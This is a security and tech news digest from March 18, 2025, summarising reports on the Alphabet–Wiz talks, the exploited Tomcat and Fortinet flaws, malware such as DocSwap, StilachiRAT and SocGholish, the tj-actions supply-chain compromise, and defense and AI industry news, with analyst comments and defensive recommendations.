Tuesday, Mar 18, 2025 // (IG): BB // GITHUB // SN R&D
Alphabet Resumes Talks to Acquire Cybersecurity Firm Wiz in $30 Billion Deal
Bottom Line Up Front (BLUF): Alphabet is in advanced discussions to acquire Wiz, a cloud security startup, for approximately $30 billion. This follows a previous attempt last summer when negotiations stalled due to regulatory concerns. If completed, the acquisition would be one of the largest tech deals of 2025 and would expand Google's cybersecurity portfolio.
Analyst Comments: This potential acquisition highlights Alphabet's ongoing strategy to strengthen its cybersecurity offerings, particularly in cloud security. Wiz, which partners with major cloud providers such as Amazon, Microsoft, and Google, would provide Alphabet with advanced security tools and reinforce its competitive position against AWS and Microsoft Azure. However, regulatory scrutiny remains a significant hurdle, as antitrust concerns surrounding Big Tech acquisitions are at an all-time high. If the deal proceeds, it could trigger further consolidation within the cybersecurity industry as rivals seek to bolster their security capabilities.
FROM THE MEDIA: Alphabet is reportedly close to finalizing a $30 billion acquisition of Wiz, a cloud security startup based in New York and Israel. The deal, which previously collapsed last summer over regulatory concerns, has been revived as both parties reassess the potential benefits. Wiz, known for its cutting-edge cybersecurity solutions, already collaborates with Google Cloud, AWS, and Microsoft Azure, making it a valuable asset for Alphabet's cloud security expansion. If successful, this acquisition would be one of the most significant tech deals of the year, further cementing Google's ambitions in the cybersecurity market. However, regulatory scrutiny is expected, given the increasing focus on Big Tech's market influence.
READ THE STORY: WSJ
Telegram CEO Leaves France Amid Criminal Investigation
Bottom Line Up Front (BLUF): Telegram founder Pavel Durov has left France and returned to Dubai after a judge temporarily suspended a judicial order requiring him to stay in the country. Durov was arrested in August 2024 at Le Bourget Airport and charged with violations related to cyber and financial crimes linked to activity on Telegram. The investigation remains ongoing, with Durov asserting that Telegram meets and exceeds legal obligations in moderation and compliance.
Analyst Comments: Authorities in Europe and the U.S. have raised concerns about exploiting Telegram for hacking tools, extremist content, and cybercrime marketplaces. While Durov maintains Telegram’s commitment to free speech and privacy, governments may push for stricter regulation and enforcement to curb illicit activities. The outcome of this investigation could influence how encrypted platforms operate under international law.
FROM THE MEDIA: Durov, who became a UAE citizen in 2021, confirmed his departure from France, thanking the investigative judges for permitting his travel. Telegram boasts 950 million monthly users and has been under government scrutiny due to its role in cybercrime and extremist content distribution. Reports suggest that criminal groups and state-sponsored actors have used Telegram for data exfiltration, hacking tools, and misinformation campaigns. The French investigation remains ongoing, and Durov’s legal situation could impact Telegram’s regulatory future in Europe and beyond.
READ THE STORY: The Record
Baidu Unveils Ernie X1 AI Model to Challenge DeepSeek
Bottom Line Up Front (BLUF): Chinese tech giant Baidu has launched Ernie X1, a new reasoning-focused AI model that aims to rival DeepSeek-R1 at half the cost. Alongside this, Baidu also released Ernie 4.5, which it claims outperforms OpenAI’s GPT-4.5 at a fraction of the price. Both models will be integrated into Baidu’s consumer ecosystem, including Baidu Search and its AI chatbot, Ernie Bot.
Analyst Comments: Baidu’s aggressive push into AI highlights the escalating competition in China’s AI race, particularly against rising startups like DeepSeek. While DeepSeek-R1 disrupted the market with high efficiency and affordability, Baidu is leveraging its cloud infrastructure and existing market dominance to retain competitiveness. The pricing strategy—offering AI at significantly lower costs than Western counterparts—suggests China’s focus on domestic AI independence. However, performance claims remain unverified, and real-world adoption will determine whether Baidu’s models can effectively challenge OpenAI and DeepSeek.
FROM THE MEDIA: Baidu’s Ernie 4.5 is positioned as a cheaper and superior alternative to OpenAI’s GPT-4.5. Analysts speculate that DeepSeek’s rapid rise pressured Baidu to accelerate its release timeline. With its AI cloud platform (Qianfan) and integration into Baidu’s services, the company aims to maintain dominance despite growing competition.
READ THE STORY: WSJ
North Korean Hackers Deploy ‘DocSwap’ Malware Disguised as Security Tool
Bottom Line Up Front (BLUF): A newly discovered malware, DocSwap, linked to a North Korean Advanced Persistent Threat (APT) group, targets mobile users—especially in South Korea. DocSwap masquerades as a legitimate document authentication app while executing malicious activities such as keylogging, data theft, and phishing. The malware dynamically decrypts and loads additional payloads, making it harder to detect and analyze.
Analyst Comments: Using accessibility permissions for keylogging and persistence tactics suggests a well-planned mobile-focused attack. The connection to the puNK-004 group further reinforces concerns about North Korea’s continued cyber operations targeting South Korean users and financial platforms. Organizations should enforce strict mobile application vetting, block unauthorized app installations, and educate users on phishing risks.
FROM THE MEDIA: Cybersecurity researchers at S2W Threat Research and Intelligence Center Talon first detected DocSwap on December 13, 2024, analyzing its behavior and infrastructure. Initially associated with a CoinSwap phishing site, the malware later displayed links to South Korea’s Naver platform, hinting at connections with the Kimsuky APT group. Upon execution, DocSwap requests excessive permissions, allowing it to perform keylogging and exfiltration of sensitive user data. The malware maintains persistence through foreground service APIs, leveraging encrypted communication with its command-and-control (C2) servers. Security experts warn that North Korean threat actors are increasingly refining their mobile malware capabilities, making attacks more complicated to detect and mitigate.
READ THE STORY: GBhackers
Silicon Valley Backs Israeli Defense Startups for U.S. Military Market
Bottom Line Up Front (BLUF): U.S. venture capital firms, including Sequoia Capital and Lux Capital, increasingly invest in Israeli defense startups to secure future U.S. and European military contracts. One notable startup, Kela, has received $39 million in funding, including backing from the CIA’s investment arm, IQT. These investments align with rising global defense budgets and the Pentagon’s shift toward new military technologies.
Analyst Comments: The involvement of Silicon Valley VCs and the CIA signals a growing belief that Israeli startups can compete with major U.S. defense contractors. However, Pentagon procurement policies may present obstacles for non-U.S. firms. Kela’s approach—blending battlefield experience with cutting-edge tech—mirrors Palantir’s successful entry into the defense sector. If this trend continues, it could reshape the defense startup landscape, fostering greater competition in military AI, surveillance, and combat tech.
FROM THE MEDIA: Kela, an Israeli startup integrating commercial and military technologies, has secured funding from top U.S. venture firms and the CIA’s venture arm, IQT. Israel’s growing defense-tech ecosystem now includes over 300 startups, doubling in a year. Investors believe these companies can compete for Pentagon contracts despite challenges faced by non-U.S. firms. Kela’s leadership, many with combat experience, positions it as a potential major player in defense AI and battlefield integration.
READ THE STORY: WSJ
Apache Tomcat Vulnerability Exploited 30 Hours After Public Disclosure
Bottom Line Up Front (BLUF): A newly disclosed vulnerability in Apache Tomcat (CVE-2025-24813) is being actively exploited just 30 hours after a proof-of-concept (PoC) was released. The flaw allows remote code execution and information disclosure in specific configurations. Affected users are urged to update to patched versions 9.0.99, 10.1.35, and 11.0.3.
Analyst Comments: This exploit’s trivial nature, requiring no authentication, makes it a high-risk threat, especially for unpatched Tomcat instances running default configurations. The ability to upload arbitrary files via partial PUT requests means attackers can quickly escalate from session hijacking to complete system compromise. Organizations using affected versions should patch immediately and audit their configurations to disable unnecessary write permissions.
FROM THE MEDIA: The Apache Tomcat vulnerability (CVE-2025-24813) is now being exploited in the wild following the release of a PoC just 30 hours after public disclosure. The flaw impacts multiple versions of Tomcat (9.x, 10.x, and 11.x) and allows attackers to upload and execute malicious files via PUT requests. Security firm Wallarm confirmed active attacks leveraging Tomcat's session persistence mechanism, where a crafted Java payload is uploaded and later executed through deserialization. The ease of exploitation and lack of authentication requirements make this a critical issue, prompting immediate action from users to apply patches and review server configurations.
READ THE STORY: THN
Hackers Rapidly Adopt ClickFix Technique for Sophisticated Attacks
Bottom Line Up Front (BLUF): Cybercriminals and nation-state actors are increasingly using the ClickFix technique, a social engineering method that tricks users into running malicious PowerShell commands. This technique, which exploits fake security prompts, enables the deployment of infostealers that harvest sensitive data like credentials and cryptocurrency wallets. Security firms are actively tracking and mitigating this growing threat.
Analyst Comments: ClickFix represents a dangerous shift in cyberattack strategies, leveraging user psychology rather than technical vulnerabilities. The technique’s success stems from its ability to bypass automated defenses, making user education and endpoint security critical. The rapid adoption by nation-state hackers suggests that this method could be used at scale for espionage and financial theft. Organizations must harden defenses to counteract this emerging threat by deploying threat intelligence, behavior-based detection, and user awareness programs.
FROM THE MEDIA: The ClickFix infection chain typically starts with phishing, malvertising, or compromised websites. Users are tricked into pasting pre-copied PowerShell scripts into their Windows Run dialog, executing malware like Lumma infostealer. This malware, sold as Malware-as-a-Service, targets browser data and crypto wallets. Security researchers have identified numerous domains hosting ClickFix content, and cybersecurity firms are developing detection signatures to combat its spread.
READ THE STORY: GBhackers
Microsoft Warns of ‘StilachiRAT’ Targeting Credentials and Crypto Wallets
Bottom Line Up Front (BLUF): Microsoft has identified StilachiRAT, a new remote access trojan (RAT) that steals browser credentials, cryptocurrency wallets, and system information. The malware employs anti-forensic techniques, clears event logs, and leverages Windows system APIs to evade detection. StilachiRAT’s command-and-control (C2) server enables real-time execution of malicious commands, making it a significant threat to enterprises and individual users.
Analyst Comments: StilachiRAT showcases advanced evasion techniques, including sandbox detection and log clearing, making it particularly difficult to detect. The targeting of popular cryptocurrency wallets suggests financial motives, while its extensive system reconnaissance capabilities indicate potential use in espionage campaigns. Organizations should implement endpoint detection and response (EDR) solutions, restrict browser-based credential storage, and monitor clipboard activities for unauthorized access to sensitive data.
FROM THE MEDIA: Microsoft researchers first detected StilachiRAT in November 2024, embedded in a DLL module named "WWStartupCtrl64.dll." While the exact delivery method remains unknown, Microsoft warns that phishing emails, malicious downloads, or software vulnerabilities may be used for initial infection. The malware harvests OS details, hardware identifiers, and active RDP sessions using Windows Management Instrumentation (WMI) queries to gather intelligence. StilachiRAT can also execute ten different remote commands, including stealing Chrome passwords, launching applications, and modifying network connections. Microsoft has urged users to update security defenses and monitor for unusual system activity.
READ THE STORY: THN
SocGholish Exploits Compromised Websites to Deliver RansomHub Ransomware
Bottom Line Up Front (BLUF): A new campaign leveraging the SocGholish malware framework has been identified as a major distributor of RansomHub ransomware. Attackers inject obfuscated JavaScript into compromised websites, redirecting users to fake browser update pages that deploy malware. SocGholish enables persistent access, data exfiltration, and ransomware delivery, with government organizations in the United States among the most targeted.
Analyst Comments: SocGholish's obfuscation techniques and integration with Keitaro Traffic Distribution System (TDS) allow attackers to evade detection while filtering out security researchers and sandbox environments. To mitigate risks, organizations should focus on hardened endpoint security, extended detection and response (XDR) solutions, and web application firewalls (WAFs). Companies must secure their CMS platforms and plugins to prevent exploitation, which focuses on compromising legitimate websites.
FROM THE MEDIA: Attackers inject malicious JavaScript into compromised websites, redirecting users to phishing pages posing as legitimate browser updates. Unsuspecting users download a malicious ZIP file, executing a loader that deploys malware and ransomware payloads. The Keitaro TDS system ensures the malware avoids security tools and remains undetected for extended periods. Cybersecurity experts recommend securing CMS platforms, enabling multi-factor authentication (MFA), and deploying web reputation services to mitigate the threat.
READ THE STORY: GBhackers
GitHub Restores Code After Malicious Changes to Popular CI/CD Tool
Bottom Line Up Front (BLUF): GitHub took emergency action to restore compromised code in the tj-actions/changed-files repository, a widely used GitHub Action affecting over 23,000 organizations. Attackers modified the tool to leak CI/CD secrets, including AWS access keys and private RSA keys. The flaw, CVE-2025-30066, allowed secrets to be exposed in build logs, making public repositories particularly vulnerable.
Analyst Comments: This incident highlights the systemic risks of third-party dependencies in CI/CD environments. Attackers target automation pipelines to introduce malicious code, leveraging the trust developers place in open-source repositories. Organizations should audit their repositories for affected versions, rotate all compromised secrets, and implement strong security policies such as code signing for all GitHub Actions. The event also underscores the need for real-time monitoring of build logs to detect potential credential leaks.
FROM THE MEDIA: Security firm StepSecurity identified unauthorized modifications in the tj-actions/changed-files GitHub Action. The vulnerability led to secrets exposure in build logs, particularly in public repositories. GitHub swiftly intervened, suspending affected accounts and removing the malicious code. Security researchers at Wiz Threat Research found dozens of affected repositories, including those operated by large enterprises. Investigations suggest a bot with stolen GitHub personal access tokens (PATs) was responsible for the breach. Experts recommend requiring signed commits, rotating all potentially exposed secrets, and closely monitoring open-source dependencies.
READ THE STORY: The Record
New C++-Based IIS Malware Evades Detection by Mimicking cmd.exe
Bottom Line Up Front (BLUF): A newly discovered malware targeting Microsoft IIS servers uses a rare C++/CLI implementation to evade detection. The malware mimics the behavior of cmd.exe
, registers for HTTP response events, and uses AES-encrypted commands to execute malicious actions stealthily. Security teams should immediately monitor IIS logs and deploy advanced threat detection solutions.
Analyst Comments: The choice of C++/CLI is unusual in malware development, likely intended to make static analysis more difficult and blend malicious activity into legitimate IIS operations. By registering for HTTP events and processing hidden commands, this malware can maintain persistence with minimal visibility. The use of a custom command wrapper further reduces forensic traces by avoiding direct execution via the IIS process. Organizations running IIS should enhance monitoring for unusual HTTP requests, check for unauthorized command execution, and deploy endpoint security solutions capable of detecting behavioral anomalies.
FROM THE MEDIA: Palo Alto Networks’ Unit 42 has identified a sophisticated IIS malware that integrates as a passive backdoor by intercepting HTTP requests. Uploaded from Thailand, the malware exists in two versions, with the latest compiled in May 2023. It filters incoming requests for specific headers and decrypts commands using AES before execution. The malware communicates with a command-and-control (C2) server via named pipes, redirecting command-line input while avoiding direct calls to cmd.exe
. It also patches AMSI and ETW routines to evade detection. Security researchers warn that this malware may already be active in targeted campaigns, emphasizing the need for proactive defense measures.
READ THE STORY: GBhackers
Alphabet Spins Off Laser-Based Internet Project Taara to Compete with Starlink
Bottom Line Up Front (BLUF): Alphabet has officially spun off its laser-based internet project, Taara, from its "moonshot" incubator. The startup aims to provide high-speed internet to remote areas by using light beams instead of satellites, positioning itself as a competitor to Elon Musk's Starlink. Taara operates in 12 countries and has secured funding from Series X Capital, while Alphabet retains a minority stake.
Analyst Comments: Taara’s approach to internet connectivity leverages optical laser technology to bypass traditional infrastructure limitations. This provides a low-cost alternative to fiber optics while avoiding the bandwidth constraints of satellite-based networks like Starlink. However, concerns remain about performance in adverse weather conditions, such as fog or heavy rain, which could disrupt the laser connections. The project’s success will largely depend on its ability to scale, integrate with telecom providers, and overcome regulatory and environmental challenges.
FROM THE MEDIA: Alphabet’s Taara, developed within its X research division, uses laser beams to transmit internet signals, offering speeds up to 20 Gbps over distances of 20 km. The technology was originally part of the now-defunct Loon project, which aimed to provide internet via high-altitude balloons. Unlike Starlink’s satellite-based model, Taara partners with telecom operators like Bharti Airtel and T-Mobile to extend fiber-optic networks to underserved areas. The startup has already demonstrated its capabilities with a 5km laser link across the Congo River, significantly reducing internet costs. With backing from Series X Capital, Taara is hiring aggressively and working on next-generation photonic chips to enhance scalability and efficiency.
READ THE STORY: FT
European Missile Manufacturer MBDA Races to Ramp Up Production Amid Security Concerns
Bottom Line Up Front (BLUF): MBDA, one of Europe’s leading missile manufacturers, rapidly increases production capacity in response to heightened defense needs. With a $40 billion order backlog and plans to invest $2.7 billion in expansion, MBDA aims to reduce reliance on U.S. weaponry. However, challenges such as supply chain constraints, workforce shortages, and competition from American defense firms remain critical obstacles.
Analyst Comments: The surge in European defense spending, driven by Russia’s invasion of Ukraine and concerns over U.S. reliability as a security partner, has created an urgent need for independent arms production. MBDA's expansion is a necessary step toward European defense sovereignty, but it highlights long-standing production limitations. The company’s slow adaptation to changing security needs and gaps in hypersonic missile capabilities and long-range air defense could limit its competitive edge. Additionally, while the U.S. has maintained consistent production levels, European firms like MBDA are struggling to scale up quickly.
FROM THE MEDIA: MBDA is doubling missile production across key weapons systems, increasing Akeron’s anti-tank guided missile output to 40 per month and boosting Aster air-defense missile production by 50% by 2026. The company addresses supply chain constraints by stockpiling strategic materials like steel and titanium while adding new manufacturing equipment and expanding its workforce. However, MBDA still lags behind U.S. defense firms, such as Lockheed Martin, which produces 720 cruise missiles annually compared to MBDA’s lower output. Furthermore, MBDA’s Samp/T air defense system has struggled to compete with the U.S. Patriot system, raising concerns about Europe’s ability to replace American military support fully.
READ THE STORY: WSJ
New Ransomware Gang ‘Mora_001’ Exploiting Fortinet Vulnerabilities
Bottom Line Up Front (BLUF): A newly discovered ransomware group, Mora_001, is actively exploiting two Fortinet vulnerabilities (CVE-2024-55591 and CVE-2025-24472) to deploy a ransomware strain called SuperBlack. The vulnerabilities affect FortiGate firewall appliances, and despite urgent patching advisories from CISA and Fortinet, attackers continue targeting unpatched systems. Mora_001 is believed to have ties to the LockBit ransomware group, leveraging LockBit’s leaked builder to create their variant.
Analyst Comments: The rapid exploitation of the Fortinet flaws highlights the urgency for organizations to patch critical infrastructure as soon as fixes become available. Mora_001’s use of LockBit 3.0’s leaked builder also suggests a growing trend of cybercriminals repurposing existing ransomware tools rather than developing new ones from scratch. To mitigate the risk, security teams should prioritize patching, network segmentation, and monitoring for unauthorized access attempts.
FROM THE MEDIA: The Mora_001 ransomware group has been exploiting the Fortinet vulnerabilities since at least February 2, 2025, according to Forescout Research and Arctic Wolf. Their attacks typically begin with unauthorized access via the vulnerabilities, followed by the deployment of SuperBlack ransomware, a LockBit 3.0 derivative with a modified ransom note. CISA issued an emergency patching directive in January, highlighting the severity of CVE-2024-55591. However, attackers now target organizations that have not fully patched their systems or hardened firewall configurations. Fortinet has issued patches for both vulnerabilities, but threat actors are accelerating attacks on unpatched devices.
READ THE STORY: The Record
Items of interest
Jack Ma’s AI Pivot Revives Alibaba’s Fortunes
Bottom Line Up Front (BLUF): Alibaba is experiencing a remarkable turnaround after shifting its focus to artificial intelligence (AI) under the quiet leadership of Jack Ma. The company has invested heavily in AI startups, chips, and research, positioning its Qwen large language model (LLM) as a leader in China. Apple has even selected Qwen for AI functions on iPhones in China. As a result, Alibaba's stock has surged 66% since the beginning of 2025, and Ma has been publicly welcomed back by Chinese leadership.
Analyst Comments: The company’s aggressive investments in AI infrastructure, cloud computing, and LLMs indicate a long-term commitment to competing with ByteDance, Tencent, and DeepSeek. However, maintaining its lead will be challenging as geopolitical tensions and domestic competition continue to shape the AI landscape. Alibaba’s success depends on its ability to commercialize AI applications and sustain government support.
FROM THE MEDIA: Alibaba’s AI transformation began in late 2022 when Jack Ma recognized the disruptive potential of AI after the launch of ChatGPT. Since then, the company has expanded its AI research teams, invested billions in chip acquisitions, and backed AI startups like Moonshot, MiniMax, and Zhipu. Its AI model, Qwen, has gained traction, and Apple’s decision to integrate Qwen into iPhones in China has further validated Alibaba’s AI capabilities. CEO Eddie Wu has spearheaded Alibaba’s AI expansion, reallocating resources from brick-and-mortar businesses to AI-driven initiatives. The company plans to spend $53 billion on AI infrastructure over the next three years, focusing on training models, AI cloud services, and consumer-facing applications. While Alibaba is currently a dominant AI player in China, it faces growing competition from Tencent, ByteDance, and emerging AI startups.
READ THE STORY: FT
What REALLY Happened To Jack Ma & Alibaba? (Video)
FROM THE MEDIA: The INSANE story of Jack Ma and the story of Alibaba. Today, we know him as Jack Ma, but back in 1964, when he was born in China, he was called Yun Ma, and it was a foreign tourist who suggested he use the English name Jack Ma. However, Jack Ma's beginnings were humble, so the story of how he built Alibaba from nothing and grew the company to be worth billions of dollars is incredible. In fact, Alibaba had the largest IPO in history when it began selling shares on the stock market.
Jack Ma and Elon Musk hold debate in Shanghai (Video)
FROM THE MEDIA: Alibaba co-founder and executive chairman Jack Ma and Tesla CEO Elon Musk hold a debate in Shanghai over artificial intelligence.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.